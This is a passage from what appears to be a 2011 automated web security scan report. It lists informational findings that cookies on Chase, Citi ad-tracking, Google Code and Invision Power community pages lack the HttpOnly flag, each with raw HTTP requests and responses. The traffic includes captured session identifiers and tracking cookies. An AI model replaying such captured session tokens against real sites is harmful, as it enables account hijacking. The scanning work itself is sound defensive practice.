User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4559
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:00 GMT
Connection: close


<html>
   <head>
       <title>Login Frame</title>
       <script language="javascript">var jsVer = "";</script>
       <script language="javascript1.1" type="text/javascript">jsVer = "1.1";</script>
       <scrip
...[SNIP]...

11.216. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /chaseonline/reidentify/sso_reidentify.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 167
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /Public/Reidentify/ReidentifyFilterView.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:01:53 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2>
</body></html>

11.217. https://chaseonline.chase.com/js/Reporting.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /js/Reporting.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Reporting.js HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 70473
Content-Type: application/x-javascript
Content-Location: https://chaseonline.chase.com/js/Reporting.js
Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT
Accept-Ranges: bytes
ETag: "02ebcc77295cb1:51e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:01:52 GMT
Connection: close


var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th
...[SNIP]...

11.218. http://citi.bridgetrack.com/a/c/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/c/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/c/?BT_BCID=249224&BT_SID=101294&_u=visitor&_d=http%3A%2F%2Fwww%2Eciti%2Ecom HTTP/1.1
Host: citi.bridgetrack.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8; VCC9=; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; VCC1=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; CitiBT%5F9=;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Tue, 01 Feb 2011 22:09:48 GMT
Location: /cbol/_redir.htm?_u=visitor&_d=http://www.citi.com&BTData=402177D7961617455514C45BEBEBEA6A09C928496F1FCF2E9EAC5C2DEA911D83&BT_AS=8&BT_CON=1&BT_TRF=40735&lid=ILC-1110102&cmp=ILC-1110102&venue=citi.com&placement=Topper&product=BusinessChecking&promotion=Q1
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Date: Wed, 02 Feb 2011 22:09:48 GMT
Connection: close


11.219. http://citi.bridgetrack.com/a/s/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 21:59:55 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/
Date: Wed, 02 Feb 2011 21:59:54 GMT
Connection: close
Content-Length: 2698

var bt_ad_content285777=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...

11.220. http://citi.bridgetrack.com/a/s/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/s/?BT_PID=285778&BT_CON=1&BT_PM=1&r=0.5880183172412217&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021659550183&S2=98501z285777&S1C=1; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Tue, 01 Feb 2011 21:59:58 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: AdData=S3C=1&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/
Date: Wed, 02 Feb 2011 21:59:58 GMT
Connection: close
Content-Length: 2652

var bt_ad_content285778=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...

11.221. http://citi.bridgetrack.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /track/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/?id=28258&random=0.5033922649454325 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; ATV1=21845dU6T0Bc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; ASB1=TX=1296683995&Pb=0&A=8&SID=2B93505C44C8494485182E450B631A65&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; ASB9=TX=1296683998&Pb=0&A=8&SID=A45E875EFD344FED80EE0CD08C0895C9&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79433&Cr=98745&W=41062&Tr=41062&Cp=4112&P=285778&B=9; ATV9=5153dU6T0Ec1c40Gc8N2Iccc30DPc2DI9cc1836c8ccc1836ccccc; AdData=S5C=1&S3C=1&S4=95408z285779&S4T=201102021659580798&S1C=1&S2=98501z285777&S2T=201102021659550183&S1T=201101282216000635&S1=98231z612428&S3T=201102021659580502&S3=98745z285778&S2C=1&S5T=201102021659590042&S5=92846z285780&S4C=1; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Tue, 01 Feb 2011 21:59:59 GMT
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=FC323225A5FB4CD5903BCDA67DC0912E; path=/
Set-Cookie: CitiBT%5F1=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/
Date: Wed, 02 Feb 2011 21:59:58 GMT
Connection: close

GIF89a.............!.......,...........L..;

11.222. http://code.google.com/p/swfobject/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:09:55 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=cf365c01c96c83f0:TM=1296684601:LM=1296684601:S=fZz2qgvUxhAStUQx; expires=Fri, 01-Feb-2013 22:10:01 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

11.223. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:24:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=97cddc4af2376b3de612ff10b3b7d0cf; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:24:10 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:24:13 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:24:13 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3MLXOtDI0sjQzszQyMzWwrgVcMFxcfwai; expires=Fri, 03-Feb-2012 00:24:13 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 120604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.224. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:22:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=82c63a8d1a6b9167bba1d1d2a3d954b7; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:22:43 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:22:46 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:22:46 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLTOtDI0sjQzszQyNTOxrgVcMFxcWwaj; expires=Fri, 03-Feb-2012 00:22:46 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 113385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.225. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:24:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=425ff1018c49e9c66902016e0783c920; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:24:08 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:24:10 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:24:10 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3NLfOtDI0sjQzszQyM7G0rgVcMFxcxwat; expires=Fri, 03-Feb-2012 00:24:10 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 102700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.226. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:21:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=556ef562dd8166c1f22f619edbd9c64a; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:22:01 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:22:03 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:22:03 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzszQyNTK0rgVcMFxcGwaa; expires=Fri, 03-Feb-2012 00:22:03 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.227. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:24:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=9e6b82cbc44744683b2585397924e931; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Wed, 03-Feb-2010 00:24:32 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:24:34 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:24:34 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzszQyMzeyrgVcMFxczQaq; expires=Fri, 03-Feb-2012 00:24:34 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 68867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.228. http://community.invisionpower.com/files/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/

Issue detail

